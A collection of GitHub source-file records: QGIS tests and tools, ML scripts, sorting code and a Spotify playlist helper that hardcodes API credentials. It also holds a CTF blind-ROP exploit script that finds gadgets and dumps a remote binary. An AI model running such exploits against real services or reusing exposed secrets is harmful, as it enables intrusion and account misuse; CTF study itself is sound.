QColor(255, 0, 0))\n scheme.setColor(QgsCodeEditorColorScheme.ColorRole.Method, QColor(0, 255, 0))\n self.assertEqual(scheme.color(QgsCodeEditorColorScheme.ColorRole.Keyword).name(), '#ff0000')\n self.assertEqual(scheme.color(QgsCodeEditorColorScheme.ColorRole.Method).name(), '#00ff00')\n\n def testSchemeRegistry(self):\n default_reg = QgsGui.codeEditorColorSchemeRegistry()\n self.assertGreaterEqual(len(default_reg.schemes()), 3)\n\n registry = QgsCodeEditorColorSchemeRegistry()\n self.assertCountEqual(registry.schemes(), ['default', 'solarized', 'solarized_dark'])\n self.assertEqual(registry.scheme('solarized').name(), 'Solarized (Light)')\n self.assertEqual(registry.scheme('solarized_dark').name(), 'Solarized (Dark)')\n\n # duplicate name\n scheme = QgsCodeEditorColorScheme('solarized', 'my name')\n self.assertFalse(registry.addColorScheme(scheme))\n\n # unique name\n scheme = QgsCodeEditorColorScheme('xxxx', 'my name')\n self.assertTrue(registry.addColorScheme(scheme))\n self.assertCountEqual(registry.schemes(), ['default', 'solarized', 'solarized_dark', 'xxxx'])\n self.assertEqual(registry.scheme('xxxx').name(), 'my name')\n\n self.assertFalse(registry.removeColorScheme('yyyy'))\n self.assertCountEqual(registry.schemes(), ['default', 'solarized', 'solarized_dark', 'xxxx'])\n self.assertTrue(registry.removeColorScheme('xxxx'))\n self.assertCountEqual(registry.schemes(), ['default', 'solarized', 'solarized_dark'])\n\n # should return default registry if matching one doesn't exist\n self.assertEqual(registry.scheme('xxxx').name(), 'Default')\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"qgis/QGIS","sub_path":"tests/src/python/test_qgscodeeditorcolorscheme.py","file_name":"test_qgscodeeditorcolorscheme.py","file_ext":"py","file_size_in_byte":3153,"program_lang":"python","lang":"en","doc_type":"code","stars":8946,"dataset":"github-code","pt":"7"} +{"seq_id":"70425485985","text":"# -*- coding: utf-8 -*-\n\"\"\"\njsonFile to graph\n\"\"\"\n\nimport json\nimport networkx as nx\n\ndef jsonFile2graph(file):\n data = None\n with open(file) as json_file:\n data = json.load(json_file)\n G = nx.MultiDiGraph()\n for n in data['nodes']:\n G.add_node(n, type=data['nodeTypes'][str(n)])\n for e in data['edges']:\n s = e['source']\n t = e['target']\n n = e['name']\n G.add_edge(s, t, type=n)\n return G","repo_name":"Antolin1/TCRMG-GNN","sub_path":"python/json2graph.py","file_name":"json2graph.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"72844831262","text":"from __future__ import print_function\nimport os\nimport argparse\nimport torch\nimport numpy as np\nfrom layers.functions.prior_box import PriorBox\nfrom utils.nms_wrapper import nms\nfrom utils.timer import Timer\n\n\ncfg = {\n 'name': 'FaceBoxes', \n 'min_sizes': [[32, 64, 128], [256], [512]], \n 'steps': [32, 64, 128], 'variance': [0.1, 0.2], \n 'clip': False, \n 'loc_weight': 2.0, \n 'gpu_train': True\n}\n\ndef decode(loc, priors, variances):\n \"\"\"Decode locations from predictions using priors to undo\n the encoding we did for offset regression at train time.\n Args:\n loc (tensor): location predictions for loc layers,\n Shape: [num_priors,4]\n priors (tensor): Prior boxes in center-offset form.\n Shape: [num_priors,4].\n variances: (list[float]) Variances of priorboxes\n Return:\n decoded bounding box predictions\n \"\"\"\n\n boxes = torch.cat((\n priors[:, :2] + loc[:, :2] * variances[0] * priors[:, 2:],\n priors[:, 2:] * torch.exp(loc[:, 2:] * variances[1])), 1)\n boxes[:, :2] -= boxes[:, 2:] / 2\n boxes[:, 2:] += boxes[:, :2]\n return boxes\n\n\nparser = argparse.ArgumentParser(description='FaceBoxes')\n\nparser.add_argument('--save_folder', default='FDDB_Evaluation/', type=str, help='Dir to save results')\nparser.add_argument('--prep_info', default='prep/')\nparser.add_argument('--prep_folder', default='benchmark_tools/result/dumpOutput_device0/')\n\nparser.add_argument('--cpu', action=\"store_true\", default=False, help='Use cpu inference')\n\nparser.add_argument('--dataset', default='FDDB', type=str, choices=['AFW', 'PASCAL', 'FDDB'], help='dataset')\nparser.add_argument('--confidence_threshold', default=0.05, type=float, help='confidence_threshold')\nparser.add_argument('--top_k', default=5000, type=int, help='top_k')\nparser.add_argument('--nms_threshold', default=0.3, type=float, help='nms_threshold')\nparser.add_argument('--keep_top_k', default=750, type=int, help='keep_top_k')\nparser.add_argument('-s', '--show_image', action=\"store_true\", default=False, help='show detection results')\nparser.add_argument('--vis_thres', default=0.5, type=float, help='visualization_threshold')\nargs = parser.parse_args()\n\n\n\nif __name__ == '__main__':\n \n _t = {'forward_pass': Timer(), 'misc': Timer()}\n print('1')\n # save file\n if not os.path.exists(args.save_folder):\n os.makedirs(args.save_folder)\n fw = open(os.path.join(args.save_folder, 'FDDB_dets.txt'), 'w')\n print('2')\n num_images=0\n # prep_info\n prepinfo_list = os.path.join(args.prep_info, 'FDDB.txt')\n with open(prepinfo_list, 'r') as fr:\n \n \n # testing begin\n for prep_info in fr:\n \n _t['misc'].tic()\n num_images= num_images+1\n print(prep_info)\n #input info\n img_name,im_height,im_width,resize=prep_info.split(' ')\n \n im_height = np.float32(im_height)\n im_width = np.float32(im_width)\n resize = np.float32(resize)\n \n scale = torch.Tensor([im_width, im_height, im_width, im_height])\n \n #input loc conf\n img_bin_1 = os.path.join(args.prep_folder,img_name+'_0.bin')\n img_bin_2 = os.path.join(args.prep_folder,img_name+'_1.bin')\n buf_1 = np.fromfile(img_bin_1, dtype=\"float32\")\n buf_2 = np.fromfile(img_bin_2, dtype=\"float32\") \n conf = np.reshape(buf_2, [1, 21824, 2])\n loc = np.reshape(buf_1, [1, 21824, 4])\n \n loc = torch.Tensor(loc)\n conf = torch.Tensor(conf)\n\n priorbox = PriorBox(cfg, image_size=(1024, 1024))\n priors = priorbox.forward()\n prior_data = priors.data\n boxes = decode(loc.data.squeeze(0), prior_data, [0.1, 0.2])\n \n boxes = boxes * scale / resize\n boxes = boxes.cpu().numpy()\n scores = conf.squeeze(0).data.cpu().numpy()[:, 1]\n \n # ignore low scores\n inds = np.where(scores > args.confidence_threshold)[0]\n boxes = boxes[inds]\n scores = scores[inds]\n \n # keep top-K before NMS\n order = scores.argsort()[::-1][:args.top_k]\n boxes = boxes[order]\n scores = scores[order]\n \n # do NMS\n dets = np.hstack((boxes, scores[:, np.newaxis])).astype(np.float32, copy=False)\n #keep = py_cpu_nms(dets, args.nms_threshold)\n keep = nms(dets, args.nms_threshold,force_cpu=True)\n dets = dets[keep, :]\n \n # keep top-K faster NMS\n dets = dets[:args.keep_top_k, :]\n \n _t['misc'].toc()\n # save dets\n if args.dataset == \"FDDB\":\n fw.write('{:s}\\n'.format(img_name))\n fw.write('{:.1f}\\n'.format(dets.shape[0]))\n for k in range(dets.shape[0]):\n xmin = dets[k, 0]\n ymin = dets[k, 1]\n xmax = dets[k, 2]\n ymax = dets[k, 3]\n score = dets[k, 4]\n w = xmax - xmin + 1\n h = ymax - ymin + 1\n fw.write('{:.3f} {:.3f} {:.3f} {:.3f} {:.3f}\\n'.format(xmin, ymin, w, h, score))\n else:\n for k in range(dets.shape[0]):\n xmin = dets[k, 0]\n ymin = dets[k, 1]\n xmax = dets[k, 2]\n ymax = dets[k, 3]\n ymin += 0.2 * (ymax - ymin + 1)\n score = dets[k, 4]\n fw.write('{:s} {:.3f} {:.1f} {:.1f} {:.1f} {:.1f}\\n'.format(img_name, score, xmin, ymin, xmax, ymax))\n print('im_detect: {:d} misc: {:.4f}s'.format( num_images, _t['misc'].average_time))\n \n\n fw.close()\n","repo_name":"Ascend/ModelZoo-PyTorch","sub_path":"ACL_PyTorch/contrib/cv/face/FaceBoxes/faceboxes_pth_postprocess.py","file_name":"faceboxes_pth_postprocess.py","file_ext":"py","file_size_in_byte":5866,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"7"} +{"seq_id":"72423778783","text":"def missingNumber(nums):\n # To Apply Binary Search, we have to sort the given array first\n nums.sort()\n \n # What are we searching for?\n # We know that numbers are in the range 0 to n which means, at each index, number should be equal to index\n # e.g. at 0, number should be 0 and so on...\n # So for each mid position, we just need to check if at mid, the number is at its correct place or not.\n # Because the array is sorted, if mid is at correct place, all elements before it are also at correct place\n \n start,end = 0, len(nums) - 1\n missing = -1\n \n while start <= end:\n mid = start + (end - start) // 2\n \n # If the element at mid is not at its correct place\n # Either that index is the missing number or \n # There is some missing number before that is causing this wrong placement\n # Hence, even after this condition is true, we won't stop searching.\n # We will search on left of mid if mid element is not at correct place\n # Else we will search on right of mid if mis is already at right place\n if nums[mid] != mid: \n missing = mid\n end = mid - 1\n else: start = mid + 1\n \n # If at the end, missing number is still -1, that means it is n which is the length of the array\n # This is for Cases such as [0,1]\n return len(nums) if missing == -1 else missing\n\n\nnums = [9,6,4,2,3,5,7,0,1]\n\nprint(\"Missing Number is -> \", missingNumber(nums))","repo_name":"itsarvindhere/binary-search","sub_path":"005. Missing Number/BinarySearchSolution.py","file_name":"BinarySearchSolution.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"39825629458","text":"from spotipy import Spotify, util\nimport json\nimport db_interface\nfrom datetime import datetime, timezone\nfrom re import sub\nfrom spotipy.exceptions import SpotifyException\n\n\ndef spotify_obj():\n client_id = 'e1e98182af4a4ca881f61231e4b0787b'\n client_secret = '72d28146bcc3430fae89d259acf03d23'\n redirect_uri = 'http://localhost:8080'\n scope = 'playlist-modify-public'\n username = 'bdfgc5lgagjyvwig35m3uy834'\n token = util.prompt_for_user_token(username, scope, client_id, client_secret, redirect_uri)\n sp = Spotify(auth=token)\n return sp\n\n\ndef grab_all_songs(artist_name):\n \"\"\"\n I thought to grab the artist ID then search through the artist_albums endpoint, but that doesn't return\n popularity.\n :param artist_name:\n \"\"\"\n spotify_api = spotify_obj()\n page = spotify_api.search(q=f'artist:\"{artist_name}\"', type=\"track\", limit=50)['tracks']\n data = []\n while True:\n date_time = str(datetime.now(timezone.utc).astimezone())\n data.append([json.dumps(page), date_time])\n try:\n page = spotify_api.next(page)['tracks']\n except (TypeError, SpotifyException):\n '''\n If the next() function fails, it returns TypeError, it means it can't find the 'next' key.\n SpotifyException happens when there's a next page, but it returns a 404.\n '''\n break\n create_new_table_in_db(artist_name)\n db_interface.create_api_data(sub('[- ]', '_', artist_name), data)\n\n\ndef find_playlist_id_if_exists(playlist_name):\n playlist_page = spotify_obj().current_user_playlists(limit=50)\n playlist_ids = [each_item['id']\n for each_item in playlist_page['items']\n if each_item['name'] == playlist_name]\n return playlist_ids\n\n\ndef delete_playlists(playlist_ids):\n \"\"\"\n No way to delete playlists with the Spotify API outright. Best way to remove them from the profile is to simply\n unfollow them.\n :param playlist_ids: A list of playlist IDs\n :return: Returns the current user playlists if you would like to confirm.\n \"\"\"\n spotify_api = spotify_obj()\n for each_playlist_id in playlist_ids:\n spotify_api.user_playlist_unfollow('bdfgc5lgagjyvwig35m3uy834', each_playlist_id)\n return spotify_api.current_user_playlists(limit=50)\n\n\ndef add_tracks_to_playlist(artist_name):\n uris_list = [item[0]\n for item in db_interface.select_data_from_table(sub('[- ]', '_', artist_name), 'URI', 'Top_Songs')]\n while True:\n playlist_id = find_playlist_id_if_exists(f'Top 50 {artist_name} Songs Right Now')\n if len(playlist_id) == 0:\n try:\n spotify_obj().user_playlist_create('bdfgc5lgagjyvwig35m3uy834',\n f\"Top 50 {artist_name} Songs Right Now\",\n public=True,\n description=\n f\"The most popular songs by {artist_name}! \"\n f\"Updated Daily.\")\n except SpotifyException:\n # Sometimes the fx returns a server error here, want the program to try again.\n pass\n continue\n break\n spotify_obj().user_playlist_replace_tracks('bdfgc5lgagjyvwig35m3uy834',\n playlist_id=playlist_id[0], tracks=uris_list)\n\n\n# SQL Interactions\ndef create_new_table_in_db(artist_name):\n \"\"\"\n This simply creates a new table in the db for our artist. Ensures there are no conflicts.\n :param artist_name:\n :return:\n \"\"\"\n db_interface.delete_table(sub('[- ]', '_', artist_name)) # Replacing table if it exists\n db_interface.create_table(sub('[- ]', '_', artist_name))\n","repo_name":"lafftar/spotify_playlist_creator","sub_path":"spc/spotify_api_interface.py","file_name":"spotify_api_interface.py","file_ext":"py","file_size_in_byte":3849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"759520578","text":"# -*- coding:utf-8 -*-\nimport random\n\nl = []\nfor i in range(0, 10):\n height = random.randint(80, 100)\n l.append(height)\n\nprint(l)\n\n\ndef InsertSort(a):\n for i in range(1, len(l)):\n for j in range(i, 0, -1):\n if a[j - 1] > a[j]:\n a[j - 1], a[j] = a[j], a[j - 1]\n else:\n break\n\n\n# 内层循环 对应遍历所有的有序数据\n# 从后往前扫描\n# 从当前无序数据的前一位开始\n# 遍历到下表为0 包括0\n\n\nInsertSort(l)\nprint(l)\n","repo_name":"ljrdemail/AID1810","sub_path":"算法/插入排序.py","file_name":"插入排序.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"5059453296","text":"from pwn import *\n\n#context.log_level = 'debug'\ncontext.arch='amd64'\n\n\nhang_addr = 0x400724\n\n\nppppppr_addr = 0x4007ba\n\ngadget2 = ppppppr_addr - 0x1a\ngadget1 = ppppppr_addr\n'''\ngadget1:\n\tmov rdx,r13\n\tmov rsi,r14\n\tmov edi,r15d\n\tcall QWORD PTR [r12+rbx*8]\n\tadd rbx,0x1\n\tcmp rbx,rbp\n\tjne 4007a0 <__libc_csu_init+0x40>\n\tadd rsp,0x8\ngadget2:\n\tpop rbx\n\tpop rbp\n\tpop r12\n\tpop r13\n\tpop r14\n\tpop r15\n\tret \n'''\nputs_addr = 0x601018\n\n#this func from Icemakr. thx.\ndef com_gadget(part1, part2, jmp2, arg1 = 0x0, arg2 = 0x0, arg3 = 0x0):\n payload = p64(part1) # part1 entry pop_rbx_pop_rbp_pop_r12_pop_r13_pop_r14_pop_r15_ret\n payload += p64(0x0) # rbx be 0x0\n payload += p64(0x1) # rbp be 0x1\n payload += p64(jmp2) # r12 jump to\n payload += p64(arg3) # r13 -> rdx arg3\n payload += p64(arg2) # r14 -> rsi arg2\n payload += p64(arg1) # r15 -> edi arg1\n payload += p64(part2) # part2 entry will call [rbx + r12 + 0x8]\n payload += 'A' * 56 # junk\n return payload\n\ndef log_in_file(addr):\n\t#f = open('log.txt','a')\n\t#f = open('gadgets.txt','a')\n\tf = open('res.txt','a')\n\tf.write(\"ok addr : 0x%x\\n\" % addr)\n\tf.close()\n\ndef log_in_file1(addr,flag,data):\n\t#f = open('log.txt','a')\n\t#f = open('gadgets.txt','a')\n\tf = open('res.txt','a')\n\tif(flag):\n\t\tf.write(\"ok addr : 0x%x\\t%s\\n\" % (addr,data))\n\telse:\n\t\tf.write(\"wront addr : 0x%x\\t%s\\n\" % (addr,data))\n\tf.close()\n\n\ndef get_hang_addr(addr):\n\tp = remote('127.0.0.1',10001)\n\tpayload = \"A\" * 72 + p64(addr)\n\tp.recvuntil('WelCome my friend,Do you know password?')\n\tp.sendline(payload)\n\ttry:\n\t\t#for junk\n\t\tp.recvline()\n\t\tif(p.recv() != None):\n\t\t\tlog.info(\"alive ! at 0x%x\" % addr)\n\t\t\tlog_in_file(addr)\n\t\t\tp.close()\n\texcept EOFError as e: \n\t\tp.close()\n\t\tlog.info(\"dead connection! at 0x%x\" % addr)\n\ndef get_gadgets_addr(addr):\n\tp = remote('127.0.0.1',10001)\n\tpayload = \"A\" * 72 + p64(addr) + p64(1)+p64(2)+p64(3)+p64(4)+p64(5)+p64(6)+p64(hang_addr)\n\tp.recvuntil('WelCome my friend,Do you know password?')\n\tp.sendline(payload)\n\ttry:\n\t\t#for junk\n\t\tp.recvline()\n\t\tif(p.recv() != None):\n\t\t\tlog.info(\"find gadgets at 0x%x\" % addr)\n\t\t\tlog_in_file(addr)\n\t\t\tp.close()\n\texcept EOFError as e: \n\t\tp.close()\n\t\tlog.info(\"dead connection! at 0x%x\" % addr)\n\n\ndef find_write_func(addr):\n\tp = remote('127.0.0.1',10001)\n\t#guess is there write() ?\n\t#payload = \"A\"*72 + com_gadget(gadget1,gadget2,addr,arg1=0,arg2=0x400000,arg3=4) +p64(hang_addr)\n\t#guess is there puts() ?\n\tpayload = \"A\"*72 + com_gadget(gadget1,gadget2,addr,arg1=0x400000)+p64(hang_addr)\n\tp.recvuntil('WelCome my friend,Do you know password?')\n\tp.sendline(payload)\n\ttry:\n\t\t#for junk\n\t\tp.recvline()\n\t\tdata = p.recv()\n\t\tif(data != None):\n\t\t\tlog.info(\"find gadgets at 0x%x\" % addr)\n\t\t\tlog.info(\"\\tget data : %s\" % data)\n\t\t\t#raw_input('###stop')\n\t\t\tif(data[0:7] != \"WelCome\"):\n\t\t\t\tlog_in_file1(addr,True,data)\n\t\t\telse:\n\t\t\t\tlog_in_file1(addr,False,data)\n\t\t\tp.close()\n\texcept EOFError as e: \n\t\tp.close()\n\t\tlog.info(\"dead connection! at 0x%x\" % addr)\n\n\ndef write2file(data):\n\tf = open('leak.bin','a')\n\tf.write(data)\n\tf.close()\n\ndef leak(addr):\n\tp = remote('127.0.0.1',10001)\n\t#p = process('./main')\n\t#raw_input('#')\n\tpayload = \"A\"*72 + com_gadget(gadget1,gadget2,puts_addr,arg1=addr)+p64(hang_addr)\n\tp.recvuntil('WelCome my friend,Do you know password?')\n\tp.sendline(payload)\n\ttry:\n\t\tp.recvline()\n\t\tdata = p.recvline().strip()\n\t\tif(data != None):\n\t\t\ttry:\n\t\t\t\tdata = data[0:data.index(\"WelCome\")]\n\t\t\texcept ValueError as e:\n\t\t\t\tdata = data\n\t\t\t#if leak data is 0x00\n\t\t\tif data == \"\":\n\t\t\t\tdata = \"\\x00\"\n\t\t\t#if leak data is end with 0x0a\n\t\t\telif(data[len(data)- 1] == '\\n' and data[len(data)- 2] == '\\n'):\n\t\t\t\tdata = data.strip()\n\t\t\t\tdata = data+\"\\x0a\"\n\t\t\tlog.info(\"leaking: 0x%x --> %s\" % (addr,(data or '').encode('hex')))\n\t\t\tp.close()\n\t\t\treturn data\n\texcept EOFError as e: \n\t\tp.close()\n\t\tlog.info(\"dead connection! at 0x%x\" % addr)\n\t\treturn None\n\t\n\ndef leak1(p,addr):\n\tpayload = \"A\"*72 + com_gadget(gadget1,gadget2,puts_addr,arg1=addr)+p64(hang_addr)\n\tp.recvuntil('WelCome my friend,Do you know password?')\n\tp.sendline(payload)\n\tp.recvline() #junk line\n\tdata = p.recvline()\n\tlog.info(\"leaking: 0x%x --> %s\" % (addr,(data or '').encode('hex')))\n\treturn data\n\ndef main():\n\t'''\n\t#p = remote('127.0.0.1',10001)\n\tp = process('./main')\n\traw_input('$')\n\tpayload = \"A\"*72 + com_gadget(gadget1,gadget2,0x601028,arg1=0,arg2=0x601060,arg3=8)\n\tp.recvuntil('WelCome my friend,Do you know password?')\n\tp.sendline(payload)\n\tp.interactive()\n\t'''\n\t'''\n\taddr_base = 0x400730\n\tfor i in xrange(0xffffff):\n\t\taddr = addr_base + i\n\t\tget_hang_addr(addr)\n\t'''\n\t'''\n\taddr_base = 0x400740\n\tfor i in xrange(0xffffff):\n\t\taddr = addr_base + i\n\t\tget_gadgets_addr(addr)\n\t'''\n\t'''\n\taddr_base = 0x600000-1\n\tfor i in xrange(0xffffff):\n\t\taddr = addr_base + i\n\t\tfind_write_func(addr)\n\t'''\n\n\t#dump bin\n\taddr = 0x600000\n\twhile True:\n\t\tdata = leak(addr)\n\t\taddr += len(data)\n\t\twrite2file(data)\n\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"threezerobravoteam/PwnableLog","sub_path":"CTFWP/hctf2016-brop/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":4962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"14272883588","text":"import arrapi, os\n\nfrom setuptools import setup, find_packages\n\nwith open(\"README.rst\", \"r\") as f:\n long_descr = f.read()\n\n__version__ = None\nif os.path.exists(\"VERSION\"):\n with open(\"VERSION\") as handle:\n for line in handle.readlines():\n line = line.strip()\n if len(line) > 0:\n __version__ = line\n break\n\nsetup(\n name=arrapi.__package_name__,\n version=__version__,\n description=arrapi.__description__,\n long_description=long_descr,\n url=arrapi.__url__,\n author=arrapi.__author__,\n author_email=arrapi.__email__,\n license=arrapi.__license__,\n packages=find_packages(),\n python_requires=\">=3.6\",\n keywords=[\"arrapi\", \"sonarr\", \"radarr\", \"arr\", \"wrapper\", \"api\"],\n install_requires=[\n \"requests\"\n ],\n project_urls={\n \"Documentation\": \"https://arrapi.metamanager.wiki\",\n \"Funding\": \"https://github.com/sponsors/meisnate12\",\n \"Source\": \"https://github.com/meisnate12/ArrAPI\",\n \"Issues\": \"https://github.com/meisnate12/ArrAPI/issues\",\n },\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"Intended Audience :: Developers\",\n \"Topic :: Software Development :: Libraries\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n ]\n)\n","repo_name":"meisnate12/ArrAPI","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"7"} +{"seq_id":"2488453524","text":"#create the stack with the list.\nclass Stack:\n def __init__(self):\n self.list = []\n\n def push(self, item):\n self.list.append(item)\n return\n\n def pop(self):\n self.list.pop(self.list[len(self.list)-1])\n return\n\n def isempty(self):\n if len(self.list) == 0:\n return True\n else:\n return False\n \n def size(self):\n return len(self.list)\n\n def top(self):\n if self.isempty():\n return \"Stack is empty\"\n return self.list[len(self.list)-1]\n\n def __str__(self):\n return \"Elements of Stack are:\" + str(self.list)\n\n \nL = Stack()\nL.push(\"a\")\nL.push(\"2\")\nL.push(\"b\")\nL.push(\"3\")\nprint(L)\n\nL.pop()\nL.pop()\nL.pop()\nL.pop()\n\nprint(L.list)\n\nS = L.isempty()\nprint(S)\n\nS = L.size()\nprint(S)\n\nS = L.top()\nprint(S)\n\n#C++ has call by value and call by refernce: https://ideone.com/6O0wEO\n#Python is call by object reference: https://ideone.com/49lKmm\n\n\n","repo_name":"shraysidubey/pythonScripts","sub_path":"stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"30507084784","text":"__author__ = 'Arnaud Morvan'\n__date__ = 'May 2015'\n__copyright__ = '(C) 2015, Arnaud Morvan'\n\nimport os\n\nfrom qgis.PyQt.QtGui import QIcon\nfrom qgis.PyQt.QtCore import QVariant\n\nfrom qgis.core import (Qgis,\n QgsApplication,\n QgsSettings,\n QgsGeometry,\n QgsFeature,\n QgsField,\n QgsFeatureRequest,\n QgsFeatureSink,\n QgsWkbTypes,\n QgsFields,\n QgsProcessing,\n QgsProcessingException,\n QgsProcessingFeatureSource,\n QgsProcessingParameterFeatureSource,\n QgsProcessingParameterEnum,\n QgsProcessingParameterFeatureSink,\n QgsProcessingOutputNumber,\n QgsProcessingParameterBoolean)\nfrom processing.algs.qgis.QgisAlgorithm import QgisAlgorithm\n\nsettings_method_key = \"/qgis/digitizing/validate_geometries\"\npluginPath = os.path.split(os.path.split(os.path.dirname(__file__))[0])[0]\n\n\nclass CheckValidity(QgisAlgorithm):\n INPUT_LAYER = 'INPUT_LAYER'\n METHOD = 'METHOD'\n VALID_OUTPUT = 'VALID_OUTPUT'\n VALID_COUNT = 'VALID_COUNT'\n INVALID_OUTPUT = 'INVALID_OUTPUT'\n INVALID_COUNT = 'INVALID_COUNT'\n ERROR_OUTPUT = 'ERROR_OUTPUT'\n ERROR_COUNT = 'ERROR_COUNT'\n IGNORE_RING_SELF_INTERSECTION = 'IGNORE_RING_SELF_INTERSECTION'\n\n def icon(self):\n return QgsApplication.getThemeIcon(\"/algorithms/mAlgorithmCheckGeometry.svg\")\n\n def svgIconPath(self):\n return QgsApplication.iconPath(\"/algorithms/mAlgorithmCheckGeometry.svg\")\n\n def group(self):\n return self.tr('Vector geometry')\n\n def groupId(self):\n return 'vectorgeometry'\n\n def tags(self):\n return self.tr('valid,invalid,detect,error').split(',')\n\n def __init__(self):\n super().__init__()\n\n def initAlgorithm(self, config=None):\n self.methods = [self.tr('The one selected in digitizing settings'),\n 'QGIS',\n 'GEOS']\n\n self.addParameter(QgsProcessingParameterFeatureSource(self.INPUT_LAYER,\n self.tr('Input layer')))\n self.addParameter(QgsProcessingParameterEnum(self.METHOD,\n self.tr('Method'), self.methods, defaultValue=2))\n self.parameterDefinition(self.METHOD).setMetadata({\n 'widget_wrapper': {\n 'useCheckBoxes': True,\n 'columns': 3}})\n\n self.addParameter(QgsProcessingParameterBoolean(self.IGNORE_RING_SELF_INTERSECTION,\n self.tr('Ignore ring self intersections'), defaultValue=False))\n\n self.addParameter(QgsProcessingParameterFeatureSink(self.VALID_OUTPUT, self.tr('Valid output'), QgsProcessing.TypeVectorAnyGeometry, None, True))\n self.addOutput(QgsProcessingOutputNumber(self.VALID_COUNT, self.tr('Count of valid features')))\n\n self.addParameter(QgsProcessingParameterFeatureSink(self.INVALID_OUTPUT, self.tr('Invalid output'), QgsProcessing.TypeVectorAnyGeometry, None, True))\n self.addOutput(QgsProcessingOutputNumber(self.INVALID_COUNT, self.tr('Count of invalid features')))\n\n self.addParameter(QgsProcessingParameterFeatureSink(self.ERROR_OUTPUT, self.tr('Error output'), QgsProcessing.TypeVectorAnyGeometry, None, True))\n self.addOutput(QgsProcessingOutputNumber(self.ERROR_COUNT, self.tr('Count of errors')))\n\n def name(self):\n return 'checkvalidity'\n\n def displayName(self):\n return self.tr('Check validity')\n\n def processAlgorithm(self, parameters, context, feedback):\n ignore_ring_self_intersection = self.parameterAsBoolean(parameters, self.IGNORE_RING_SELF_INTERSECTION, context)\n method_param = self.parameterAsEnum(parameters, self.METHOD, context)\n if method_param == 0:\n settings = QgsSettings()\n method = int(settings.value(settings_method_key, 0)) - 1\n method = max(method, 0)\n else:\n method = method_param - 1\n\n return self.doCheck(\n method, parameters, context, feedback, ignore_ring_self_intersection\n )\n\n def doCheck(self, method, parameters, context, feedback, ignore_ring_self_intersection):\n flags = QgsGeometry.FlagAllowSelfTouchingHoles if ignore_ring_self_intersection else QgsGeometry.ValidityFlags()\n source = self.parameterAsSource(parameters, self.INPUT_LAYER, context)\n if source is None:\n raise QgsProcessingException(self.invalidSourceError(parameters, self.INPUT_LAYER))\n\n (valid_output_sink, valid_output_dest_id) = self.parameterAsSink(parameters, self.VALID_OUTPUT, context,\n source.fields(), source.wkbType(), source.sourceCrs())\n valid_count = 0\n\n invalid_fields = source.fields()\n invalid_fields.append(QgsField('_errors', QVariant.String, 'string', 255))\n (invalid_output_sink, invalid_output_dest_id) = self.parameterAsSink(parameters, self.INVALID_OUTPUT, context,\n invalid_fields, source.wkbType(), source.sourceCrs())\n invalid_count = 0\n\n error_fields = QgsFields()\n error_fields.append(QgsField('message', QVariant.String, 'string', 255))\n (error_output_sink, error_output_dest_id) = self.parameterAsSink(parameters, self.ERROR_OUTPUT, context,\n error_fields, QgsWkbTypes.Point, source.sourceCrs())\n error_count = 0\n\n features = source.getFeatures(QgsFeatureRequest(), QgsProcessingFeatureSource.FlagSkipGeometryValidityChecks)\n total = 100.0 / source.featureCount() if source.featureCount() else 0\n for current, inFeat in enumerate(features):\n if feedback.isCanceled():\n break\n geom = inFeat.geometry()\n attrs = inFeat.attributes()\n\n valid = True\n if not geom.isNull() and not geom.isEmpty():\n errors = list(geom.validateGeometry(Qgis.GeometryValidationEngine(method), flags))\n if errors:\n valid = False\n reasons = []\n for error in errors:\n errFeat = QgsFeature()\n error_geom = QgsGeometry.fromPointXY(error.where())\n errFeat.setGeometry(error_geom)\n errFeat.setAttributes([error.what()])\n if error_output_sink:\n error_output_sink.addFeature(errFeat, QgsFeatureSink.FastInsert)\n error_count += 1\n\n reasons.append(error.what())\n\n reason = \"\\n\".join(reasons)\n if len(reason) > 255:\n reason = reason[:252] + '…'\n attrs.append(reason)\n\n outFeat = QgsFeature()\n outFeat.setGeometry(geom)\n outFeat.setAttributes(attrs)\n\n if valid:\n if valid_output_sink:\n valid_output_sink.addFeature(outFeat, QgsFeatureSink.FastInsert)\n valid_count += 1\n\n else:\n if invalid_output_sink:\n invalid_output_sink.addFeature(outFeat, QgsFeatureSink.FastInsert)\n invalid_count += 1\n\n feedback.setProgress(int(current * total))\n\n results = {\n self.VALID_COUNT: valid_count,\n self.INVALID_COUNT: invalid_count,\n self.ERROR_COUNT: error_count\n }\n if valid_output_sink:\n results[self.VALID_OUTPUT] = valid_output_dest_id\n if invalid_output_sink:\n results[self.INVALID_OUTPUT] = invalid_output_dest_id\n if error_output_sink:\n results[self.ERROR_OUTPUT] = error_output_dest_id\n return results\n","repo_name":"qgis/QGIS","sub_path":"python/plugins/processing/algs/qgis/CheckValidity.py","file_name":"CheckValidity.py","file_ext":"py","file_size_in_byte":8213,"program_lang":"python","lang":"en","doc_type":"code","stars":8946,"dataset":"github-code","pt":"7"} +{"seq_id":"13485668624","text":"import pandas as pd\r\nimport numpy as np\r\nfrom sklearn.model_selection import train_test_split\r\nfrom tensorflow import keras as K\r\nfrom tensorflow.keras.models import Sequential\r\nfrom tensorflow.keras.layers import Dense\r\nfrom sklearn.metrics import mean_squared_error\r\n\r\n\r\nfile = 